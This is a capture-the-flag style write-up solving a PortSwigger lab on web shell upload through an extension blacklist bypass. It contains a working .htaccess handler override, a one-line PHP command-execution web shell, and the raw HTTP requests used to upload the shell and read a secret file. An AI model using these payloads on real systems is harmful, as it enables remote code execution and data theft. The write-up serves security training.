Web shell upload via extension blacklist bypass
Web shell upload via extension blacklist bypass
Solution
Login to PA as user wiener
L: wiener
P: peter
Upload file: .htaccess
Content of file
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Web shell upload via extension blacklist bypass]
└─$ cat .htaccess
AddType application/x-httpd-php .hack
---
Upload .htaccess
POST /my-account/avatar HTTP/2
Host: 0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Cookie: session=CXLpUNpZJDgxbAAPAB3YaHlbSakmZVp5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------291590563116752919603639149352
Content-Length: 533
Origin: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Referer: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------291590563116752919603639149352
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: application/octet-stream
AddType application/x-httpd-php .hack
-----------------------------291590563116752919603639149352
Content-Disposition: form-data; name="user"
wiener
-----------------------------291590563116752919603639149352
Content-Disposition: form-data; name="csrf"
sTeov2hWu4or3x68DbBoLVxzn4DJqIt4
-----------------------------291590563116752919603639149352--
Upload webshell
Content of file
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Web shell upload via extension blacklist bypass]
└─$ cat webshell.hack
<?php echo system($_GET['cmd']); ?>
---
Upload webshell
POST /my-account/avatar HTTP/2
Host: 0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Cookie: session=CXLpUNpZJDgxbAAPAB3YaHlbSakmZVp5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------339534280341599772712996490397
Content-Length: 535
Origin: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Referer: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------339534280341599772712996490397
Content-Disposition: form-data; name="avatar"; filename="webshell.hack"
Content-Type: application/octet-stream
<?php echo system($_GET['cmd']); ?>
-----------------------------339534280341599772712996490397
Content-Disposition: form-data; name="user"
wiener
-----------------------------339534280341599772712996490397
Content-Disposition: form-data; name="csrf"
sTeov2hWu4or3x68DbBoLVxzn4DJqIt4
-----------------------------339534280341599772712996490397--
Read secret from: /home/carlos/secret
GET /files/avatars/webshell.hack?cmd=cat%20/home/carlos/secret HTTP/2
Host: 0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Cookie: session=CXLpUNpZJDgxbAAPAB3YaHlbSakmZVp5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
___
HTTP/2 200 OK
Date: Thu, 02 Jan 2025 11:39:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 64
AHw7OztBr1eb3EdKFZgz8AIDNVyo21vlAHw7OztBr1eb3EdKFZgz8AIDNVyo21vl
---
https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net/files/avatars/webshell.hack?cmd=cat%20/home/carlos/secret
Secret: AHw7OztBr1eb3EdKFZgz8AIDNVyo21vlAHw7OztBr1eb3EdKFZgz8AIDNVyo21vl
Submit solution
Submit solution